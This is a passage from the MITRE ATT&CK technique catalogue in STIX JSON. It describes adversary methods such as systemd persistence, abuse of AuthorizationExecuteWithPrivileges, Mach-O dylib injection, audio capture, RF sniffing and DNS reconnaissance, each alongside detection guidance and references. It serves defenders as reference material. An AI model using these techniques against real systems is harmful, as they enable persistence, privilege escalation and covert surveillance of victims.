Retrieved June 23, 2020.", "url": "https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript"}, {"source_name": "Microsoft Windows Scripts", "description": "Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved June 23, 2020.", "url": "https://docs.microsoft.com/scripting/winscript/windows-script-interfaces"}, {"source_name": "Apple About Mac Scripting 2016", "description": "Apple. (2016, June 13). About Mac Scripting. Retrieved April 14, 2021.", "url": "https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html"}, {"source_name": "SpecterOps JXA 2020", "description": "Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14, 2021.", "url": "https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5"}, {"source_name": "SentinelOne macOS Red Team", "description": "Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple APIs Without Building Binaries. Retrieved July 17, 2020.", "url": "https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/"}, {"source_name": "Red Canary Silver Sparrow Feb2021", "description": "Tony Lambert. (2021, February 18). Clipping Silver Sparrow\u2019s wings: Outing macOS malware before it takes flight. Retrieved April 20, 2021.", "url": "https://redcanary.com/blog/clipping-silver-sparrows-wings/"}, {"source_name": "MDSec macOS JXA and VSCode", "description": "Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans with VSCode Extensions. Retrieved April 20, 2021.", "url": "https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:56:59.193Z", "name": "Wireless Sniffing", "description": "Adversaries may seek to capture radio frequency (RF) communication used for remote control and reporting in distributed environments. RF communication frequencies vary between 3 kHz to 300 GHz, although are commonly between 300 MHz to 6 GHz. (Citation: Candell, R., Hany, M., Lee, K. B., Liu,Y., Quimby, J., Remley, K. April 2018) The wavelength and frequency of the signal affect how the signal propagates through open air, obstacles (e.g. walls and trees) and the type of radio required to capture them. These characteristics are often standardized in the protocol and hardware and may have an effect on how the signal is captured. Some examples of wireless protocols that may be found in cyber-physical environments are: WirelessHART, Zigbee, WIA-FA, and 700 MHz Public Safety Spectrum. \n\nAdversaries may capture RF communications by using specialized hardware, such as software defined radio (SDR), handheld radio, or a computer with radio demodulator tuned to the communication frequency. (Citation: Bastille April 2017) Information transmitted over a wireless medium may be captured in-transit whether the sniffing device is the intended destination or not. This technique may be particularly useful to an adversary when the communications are not encrypted. (Citation: Gallagher, S. April 2017) \n\nIn the 2017 Dallas Siren incident, it is suspected that adversaries likely captured wireless command message broadcasts on a 700 MHz frequency during a regular test of the system. These messages were later replayed to trigger the alarm systems. (Citation: Gallagher, S. April 2017)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "discovery"}, {"kill_chain_name": "mitre-ics-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["ICSCoE Japan"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": ["Network Traffic: Network Traffic Flow"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0fe075d5-beac-4d02-b93e-0f874997db72", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0887", "external_id": "T0887"}, {"source_name": "Bastille April 2017", "description": "Bastille 2017, April 17 Dallas Siren Attack Retrieved. 2020/11/06 ", "url": "https://www.bastille.net/blogs/2017/4/17/dallas-siren-attack"}, {"source_name": "Candell, R., Hany, M., Lee, K. B., Liu,Y., Quimby, J., Remley, K. April 2018", "description": "Candell, R., Hany, M., Lee, K. B., Liu,Y., Quimby, J., Remley, K. 2018, April Guide to Industrial Wireless Systems Deployments Retrieved. 2020/12/01 ", "url": "https://nvlpubs.nist.gov/nistpubs/ams/NIST.AMS.300-4.pdf"}, {"source_name": "Gallagher, S. April 2017", "description": "Gallagher, S. 2017, April 12 Pirate radio: Signal spoof set off Dallas emergency sirens, not network hack Retrieved. 2020/12/01 ", "url": "https://arstechnica.com/information-technology/2017/04/dallas-siren-hack-used-radio-signals-to-spoof-alarm-says-city-manager/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-10-21T14:32:48.393Z", "name": "DNS", "description": "Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target\u2019s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)\n\nAdversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)"], "x_mitre_deprecated": false, "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.1", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea", "created": "2020-10-02T15:47:10.102Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1590/002", "external_id": "T1590.002"}, {"source_name": "Circl Passive DNS", "description": "CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020.", "url": "https://www.circl.lu/services/passive-dns/"}, {"source_name": "DNS Dumpster", "description": "Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.", "url": "https://dnsdumpster.com/"}, {"source_name": "Sean Metcalf Twitter DNS Records", "description": "Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved May 27, 2022.", "url": "https://twitter.com/PyroTek3/status/1126487227712921600/photo/1"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Systemd Service", "description": "Systemd services can be used to establish persistence on a Linux system. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.\n\nSystemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the /etc/systemd/system and /usr/lib/systemd/system directories and have the file extension .service. Each service unit file may contain numerous directives that can execute system commands. \n\n* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. \n* ExecReload directive covers when a service restarts. \n* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at recurring intervals, such as at system boot.(Citation: Anomali Rocke March 2019)(Citation: gist Arch package compromise 10JUL2018)(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018)\n\nWhile adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Tony Lambert, Red Canary"], "x_mitre_detection": "Systemd service unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and /home//.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of \u2018systemd\u2019, a parent process ID of 1, and will usually execute as the \u2018root\u2019 user.\n\nSuspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: systemctl list-units -\u2013type=service \u2013all. Analyze the contents of .service files present on the file system and ensure that they refer to legitimate, expected executables.\n\nAuditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as /usr/sbin/service may reveal malicious systemd service execution.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["root", "User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0fff2797-19cb-41ea-a5f1-8a9303b8158e", "created": "2019-04-23T15:34:30.008Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1501", "external_id": "T1501"}, {"source_name": "Linux man-pages: systemd January 2014", "description": "Linux man-pages. (2014, January). systemd(1) - Linux manual page. Retrieved April 23, 2019.", "url": "http://man7.org/linux/man-pages/man1/systemd.1.html"}, {"source_name": "Freedesktop.org Linux systemd 29SEP2018", "description": "Freedesktop.org. (2018, September 29). systemd System and Service Manager. Retrieved April 23, 2019.", "url": "https://www.freedesktop.org/wiki/Software/systemd/"}, {"source_name": "Anomali Rocke March 2019", "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019.", "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang"}, {"source_name": "gist Arch package compromise 10JUL2018", "description": "Catalin Cimpanu. (2018, July 10). ~x file downloaded in public Arch package compromise. Retrieved April 23, 2019.", "url": "https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a"}, {"source_name": "Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018", "description": "Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux AUR Package Repository. Retrieved April 23, 2019.", "url": "https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/"}, {"source_name": "acroread package compromised Arch Linux Mail 8JUL2018", "description": "Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved April 23, 2019.", "url": "https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html"}, {"source_name": "Rapid7 Service Persistence 22JUNE2016", "description": "Rapid7. (2016, June 22). Service Persistence. Retrieved April 23, 2019.", "url": "https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Elevated Execution with Prompt", "description": "Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.\n\nAdversaries may abuse AuthorizationExecuteWithPrivileges to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it's all broken!)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Erika Noerenberg, @gutterchurl, Carbon Black", "Jimmy Astle, @AstleJimmy, Carbon Black"], "x_mitre_detection": "Consider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.0", "x_mitre_effective_permissions": ["root"], "x_mitre_permissions_required": ["Administrator", "User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--101c3a64-9ba5-46c9-b573-5c501053cbca", "created": "2019-08-08T14:29:37.108Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1514", "external_id": "T1514"}, {"source_name": "AppleDocs AuthorizationExecuteWithPrivileges", "description": "Apple. (n.d.). Apple Developer Documentation - AuthorizationExecuteWithPrivileges. Retrieved August 8, 2019.", "url": "https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg"}, {"source_name": "Death by 1000 installers; it's all broken!", "description": "Patrick Wardle. (2017). Death by 1000 installers; it's all broken!. Retrieved August 8, 2019.", "url": "https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8"}, {"source_name": "Carbon Black Shlayer Feb 2019", "description": "Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019.", "url": "https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/"}, {"source_name": "OSX Coldroot RAT", "description": "Patrick Wardle. (2018, February 17). Tearing Apart the Undetected (OSX)Coldroot RAT. Retrieved August 8, 2019.", "url": "https://objective-see.com/blog/blog_0x2A.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2024-01-23T22:53:18.389Z", "name": "Audio Capture", "description": "An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.\n\nBehavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "created": "2017-05-31T21:31:34.528Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1123", "external_id": "T1123"}, {"source_name": "ESET Attor Oct 2019", "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020.", "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-02-15T14:14:03.942Z", "name": "Create or Modify System Process", "description": "Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.(Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. \n\nServices, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.(Citation: OSX Malware Detection) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for changes to system processes that do not correlate with known software, patch cycles, etc., including by comparing results against a trusted system baseline. New, benign system processes may be created during installation of new software. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. \n\nCommand-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. \n\nMonitor for changes to files associated with system-level processes.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "macOS", "Linux", "Containers"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", "created": "2020-01-10T16:03:18.865Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1543", "external_id": "T1543"}, {"source_name": "AppleDocs Launch Agent Daemons", "description": "Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017.", "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html"}, {"source_name": "TechNet Services", "description": "Microsoft. (n.d.). Services. Retrieved June 7, 2016.", "url": "https://technet.microsoft.com/en-us/library/cc772408.aspx"}, {"source_name": "OSX Malware Detection", "description": "Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017.", "url": "https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "External Remote Services", "description": "Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)\n\nAccess to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.\n\nAccess may also be gained through an exposed service that doesn\u2019t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["ExtraHop", "David Fiser, @anu4is, Trend Micro", "Alfredo Oliveira, Trend Micro", "Idan Frimark, Cisco", "Rory McCune, Aqua Security", "Yuval Avrahami, Palo Alto Networks", "Jay Chen, Palo Alto Networks", "Brad Geesaman, @bradgeesaman", "Magno Logan, @magnologan, Trend Micro", "Ariel Shuper, Cisco", "Yossi Weizman, Azure Defender Research Team", "Vishwas Manral, McAfee", "Daniel Oakley", "Travis Smith, Tripwire", "David Tayouri"], "x_mitre_deprecated": false, "x_mitre_detection": "Follow best practices for detecting adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours.\n\nWhen authentication is not required to access an exposed remote service, monitor for follow-on activities such as anomalous external use of the exposed API or application.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "Containers", "macOS"], "x_mitre_version": "2.4", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d", "created": "2017-05-31T21:31:44.421Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1133", "external_id": "T1133"}, {"source_name": "Volexity Virtual Private Keylogging", "description": "Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.", "url": "https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/"}, {"source_name": "MacOS VNC software for Remote Desktop", "description": "Apple Support. (n.d.). Set up a computer running VNC software for Remote Desktop. Retrieved August 18, 2021.", "url": "https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac"}, {"source_name": "Unit 42 Hildegard Malware", "description": "Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.", "url": "https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/"}, {"source_name": "Trend Micro Exposed Docker Server", "description": "Remillano II, A., et al. (2020, June 20). XORDDoS, Kaiji Variants Target Exposed Docker Servers. Retrieved April 5, 2021.", "url": "https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Component Firmware", "description": "Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1019) but conducted upon other system components that may not have the same capability or level of integrity checking. Malicious device firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.\n\nDisk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_defense_bypassed": ["File monitoring", "Host intrusion prevention systems", "Anti-virus"], "x_mitre_permissions_required": ["SYSTEM"], "x_mitre_system_requirements": ["Ability to update component device firmware from the host operating system."], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44", "created": "2017-05-31T21:31:22.374Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1109", "external_id": "T1109"}, {"source_name": "SanDisk SMART", "description": "SanDisk. (n.d.). Self-Monitoring, Analysis and Reporting Technology (S.M.A.R.T.). Retrieved October 2, 2018."}, {"source_name": "SmartMontools", "description": "smartmontools. (n.d.). smartmontools. Retrieved October 2, 2018.", "url": "https://www.smartmontools.org/"}, {"source_name": "ITWorld Hard Disk Health Dec 2014", "description": "Pinola, M. (2014, December 14). 3 tools to check your hard drive's health and make sure it's not already dying on you. Retrieved October 2, 2018.", "url": "https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "LC_LOAD_DYLIB Addition", "description": "Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.\n\nAdversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn\u2019t checked at load time.(Citation: Malware Persistence on OS X)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor processes for those that may be used to modify binary headers. Monitor file systems for changes to application binaries and invalid checksums/signatures. Changes to binaries that do not line up with application updates or patches are also extremely suspicious.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--10ff21b9-5a01-4268-a1b5-3b55015f1847", "created": "2020-01-24T14:21:52.750Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1546/006", "external_id": "T1546.006"}, {"source_name": "Malware Persistence on OS X", "description": "Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017.", "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"}, {"source_name": "Writing Bad Malware for OSX", "description": "Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017.", "url": "https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf"}], "object_marking_refs": 